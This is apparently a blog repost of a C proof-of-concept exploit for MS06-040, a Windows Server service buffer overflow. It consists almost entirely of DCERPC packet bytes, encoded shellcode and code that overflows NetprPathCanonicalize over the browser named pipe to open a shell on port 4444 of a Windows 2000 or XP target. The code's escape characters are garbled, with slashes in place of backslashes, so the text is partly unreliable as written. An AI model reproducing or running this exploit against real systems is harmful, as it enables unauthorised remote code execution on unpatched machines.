ms06040 code

最新推荐文章于 2024-09-15 22:47:38 发布

H2SO2H2SO2

最新推荐文章于 2024-09-15 22:47:38 发布

阅读量822

点赞数

文章标签： service windows microsoft interface buffer null

/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
*  Windows XP SP1
*  Windows 2000 SP4
*
* Systems Affected:
*  Microsoft Windows 2000 SP0-SP4
*  Microsoft Windows XP SP0-SP1
*  Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
   "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x00/x00/x00/x00"
   "/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x01/x00"
   "/xC8/x4F/x32/x4B/x70/x16/xD3/x01/x12/x78/x5A/x47/xBF/x6E/xE1/x88"
   "/x03/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00"
   "/x2B/x10/x48/x60/x02/x00/x00/x00";

// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
   "/x05/x00/x00/x03/x10/x00/x00/x00/x30/x08/x00/x00/x00/x00/x00/x00"
   "/x18/x08/x00/x00/x00/x00/x1f/x00/xff/xff/xff/xff/x01/x00/x00/x00"
   "/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00";

   // path ...

unsigned char DCERPC_Request_RPC_Service_[] =
   "/xfa/x00/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00"
   "/x00/x00/x00/x00/xfa/x00/x00/x00/x00/x00/x00/x00";

unsigned char sc[] =
   "/x6a/x51/x59/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xa8/x97/x90"
   "/x88/x83/xeb/xfc/xe2/xf4/x29/x53/x6f/x67/x57/x68/xd4/x74/xc2/x7c"
   "/xdd/x60/x51/x68/x6f/x77/xc8/x1c/xfc/xac/x8c/x1c/xd5/xb4/x23/xeb"
   "/x95/xf0/xa9/x78/x1b/xc7/xb0/x1c/xcf/xa8/xa9/x7c/xd9/x03/x9c/x1c"
   "/x91/x66/x99/x57/x09/x24/x2c/x57/xe4/x8f/x69/x5d/x9d/x89/x6a/x7c"
   "/x64/xb3/xfc/xb3/xb8/xfd/x4d/x1c/xcf/xac/xa9/x7c/xf6/x03/xa4/xdc"
   "/x1b/xd7/xb4/x96/x7b/x8b/x84/x1c/x19/xe4/x8c/x8b/xf1/x4b/x99/x4c"
   "/xf4/x03/xeb/xa7/x1b/xc8/xa4/x1c/xe0/x94/x05/x1c/xd0/x80/xf6/xff"
   "/x1e/xc6/xa6/x7b/xc0/x77/x7e/xf1/xc3/xee/xc0/xa4/xa2/xe0/xdf/xe4"
   "/xa2/xd7/xfc/x68/x40/xe0/x63/x7a/x6c/xb3/xf8/x68/x46/xd7/x21/x72"
   "/xf6/x09/x45/x9f/x92/xdd/xc2/x95/x6f/x58/xc0/x4e/x99/x7d/x05/xc0"
   "/x6f/x5e/xfb/xc4/xc3/xdb/xfb/xd4/xc3/xcb/xfb/x68/x40/xee/xc0/x86"
   "/xcc/xee/xfb/x1e/x71/x1d/xc0/x33/x8a/xf8/x6f/xc0/x6f/x5e/xc2/x87"
   "/xc1/xdd/x57/x47/xf8/x2c/x05/xb9/x79/xdf/x57/x41/xc3/xdd/x57/x47"
   "/xf8/x6d/xe1/x11/xd9/xdf/x57/x41/xc0/xdc/xfc/xc2/x6f/x58/x3b/xff"
   "/x77/xf1/x6e/xee/xc7/x77/x7e/xc2/x6f/x58/xce/xfd/xf4/xee/xc0/xf4"
   "/xfd/x01/x4d/xfd/xc0/xd1/x81/x5b/x19/x6f/xc2/xd3/x19/x6a/x99/x57"
   "/x63/x22/x56/xd5/xbd/x76/xea/xbb/x03/x05/xd2/xaf/x3b/x23/x03/xff"
   "/xe2/x76/x1b/x81/x6f/xfd/xec/x68/x46/xd3/xff/xc5/xc1/xd9/xf9/xfd"
   "/x91/xd9/xf9/xc2/xc1/x77/x78/xff/x3d/x51/xad/x59/xc3/x77/x7e/xfd"
   "/x6f/x77/x9f/x68/x40/x03/xff/x6b/x13/x4c/xcc/x68/x46/xda/x57/x47"
   "/xf8/x67/x66/x77/xf0/xdb/x57/x41/x6f/x58";

int main(int argc, char* argv[])
{
   HANDLE hFile;
   NETRESOURCE nr;

   char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

   unsigned int i;

   unsigned char szInBuf[4096];
   unsigned long dwRead, nWritten;

   unsigned char szReqBuf[2096];

   if (argc < 3){
      printf("[-] Usage: ms06040poc <host> [target]/n");
      printf("/t1 - Windows 2000 SP0-SP4/n");
      printf("/t2 - Windows XP SP0-SP1/n");
      return -1;
   }

   memset(szReqBuf, 0, sizeof(szReqBuf));

   if (atoi(argv[2]) == 1) {
      unsigned char szBuff[1064];

      // build payload buffer
      memset(szBuff, '/x90', 1000);
      memcpy(szBuff+630, sc, sizeof(sc));

      for(i=1000; i<1064; i+=4) {
            memcpy(szBuff+i, "/x04/x08/x02/x00", 4);
      }

      // build request buffer
      memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
      memcpy(szReqBuf+44, "/x15/x02/x00/x00", 4); /* max count */
      memcpy(szReqBuf+48, "/x00/x00/x00/x00", 4); /* offset */
      memcpy(szReqBuf+52, "/x15/x02/x00/x00", 4); /* actual count */
      memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
      memcpy(szReqBuf+1120, "/x00/x00/x00/x00", 4); /* align string */
      memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
      memcpy(szReqBuf+1140 , "/xeb/x02", 2);
   }
   if (atoi(argv[2]) == 2) {
      unsigned char szBuff[708];

      memset(szBuff, '/x90', 612); /* size of shellcode */
      memcpy(szBuff, sc, sizeof(sc));

      memcpy(szBuff+612, "/x0a/x08/x02/x00", 4);
      memset(szBuff+616, 'A', 8); // 8 bytes padding
      memcpy(szBuff+624, "/x04/x08/x02/x00", 4);
      memset(szBuff+628, '/x90', 32);
      memcpy(szBuff+660, "/x04/x08/x02/x00", 4);
      memset(szBuff+664, 'B', 8); // 8 bytes padding
      memcpy(szBuff+672, "/x04/x08/x02/x00", 4);
      memset(szBuff+676, '/x90', 32);

      // build request buffer
      memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
      memcpy(szReqBuf+44, "/x63/x01/x00/x00", 4); /* max count */
      memcpy(szReqBuf+48, "/x00/x00/x00/x00", 4); /* offset */
      memcpy(szReqBuf+52, "/x63/x01/x00/x00", 4); /* actual count */
      memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
      memcpy(szReqBuf+764, "/x00/x00/x00/x00", 4); /* align string */
      memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
   }

   printf("[+] Connecting to %s ... /n", argv[1]);

   _snprintf(szRemoteName, sizeof(szRemoteName), "%s//ipc$", argv[1]);
   nr.dwType = RESOURCETYPE_ANY;
   nr.lpLocalName = NULL;
   nr.lpProvider = NULL;
   nr.lpRemoteName = szRemoteName;
   if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
      printf("[-] Failed to connect to host !/n");
      return -1;
   }

   _snprintf(szPipePath, sizeof(szPipePath), "%s//pipe//browser", argv[1]);
   hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

   if (hFile == INVALID_HANDLE_VALUE) {
      printf("[-] Failed to open named pipe !/n");
      return -1;
   }

   printf("[+] Binding to RPC interface ... /n");
   if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
      printf("[-] Failed to bind to interface !/n");
      CloseHandle(hFile);
      return -1;
   }

   printf("[+] Sending RPC request ... /n");
   if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
      printf("[-] Unable to transmit RPC request !/n");
      CloseHandle(hFile);
      return -1;
   }

   printf("[+] Now check for shell on %s:4444 !/n", argv[1]);

   return 0;
}